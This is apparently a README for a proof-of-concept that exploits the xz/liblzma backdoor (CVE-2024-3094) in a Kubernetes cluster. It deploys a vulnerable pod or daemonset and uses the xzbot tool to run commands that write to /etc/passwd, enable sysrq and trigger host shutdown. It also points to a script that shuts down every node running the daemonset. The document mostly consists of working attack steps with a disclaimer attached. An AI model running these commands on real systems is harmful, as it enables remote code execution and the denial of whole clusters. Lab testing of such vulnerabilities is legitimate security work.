Basic POC to test CVE-2024-3094 vulnerability inside K8s cluster
USE ONLY FOR EDUCATIONAL PURPOSES THE AUTHOR IS NOT RESPONSIBLE FOR ANY DAMAGE CAUSED BY THE USE OF THIS SOFTWARE
We will deploy a vulnerable pod and exploit it to execute commands inside that vulnerable pods, we do inside the same network for security reasons. We don't expossed the vulnerable pod to the internet, but is the same concept.
That vulnerability allows to execute commands inside the pod, even if the pod is running whit security context, you can for ex shutdown the host that is running the pod.
If that vulnerability is running in a single pod, you can shutdown the host, making temporal unavailable all the services running in that host. But, if the vulnerability is running as a deamonset, you can shutdown all the hosts that are running that deamonset, even shutdown the whole cluster.
- K8s cluster deployed
- Kubectl installed
- Access to the K8s cluster
- Go installed
First, install xzbots in the cluster
go install github.com/amlweems/xzbot@latestDownload the repo and deploy the vulnerable deployment/daemonset
git clone https://github.com/shefirot/CVE-2024-3094.git
cd CVE-2024-3094
# Deployment
kubectl apply -f deploy_cve-2024-3094.yml
# Or daemonset
kubectl apply -f daemonset_cve-2024-3094.yml# Get the pod name
kubectl -n vulnes get pods
# Port forward the pod
kubectl -n vulnes port-forward <pod-name> 2225:22
# Execute command, for example write in /etc/passwd
$HOME/go/bin/xzbot -addr 127.0.0.1:2225 -cmd 'echo "David estuvo aqui" >> /etc/passwd'
# Check the /etc/passwd file
kubectl -n vulnes exec <pod-name> -- /usr/bin/cat /etc/passwd
Go forward and shutdown the host
# Enable sysrq
$HOME/go/bin/xzbot -addr 127.0.0.1:2225 -cmd 'echo 1 > /proc/sys/kernel/sysrq'
# Shutdown the host
$HOME/go/bin/xzbot -addr 127.0.0.1:2225 -cmd 'echo o > /proc/sysrq-trigger'You can also shutdown all the hosts that are running the daemonset
source shutdown_nodes.shWhen you execute the loop to shutdown all the hosts, if you receive this error:
2024/06/11 12:08:58 dial tcp 127.0.0.1:2225: connect: connection refusedGive more time to the port forward to be ready, you can increase the sleep time in the loop.
The container image ussed was generated whit the dockerfile in the repo, you can generate the image and push it to your registry.
To generate liblzma.so.5.6.0.patch library, you can use the following the amlweems repo that is in the references.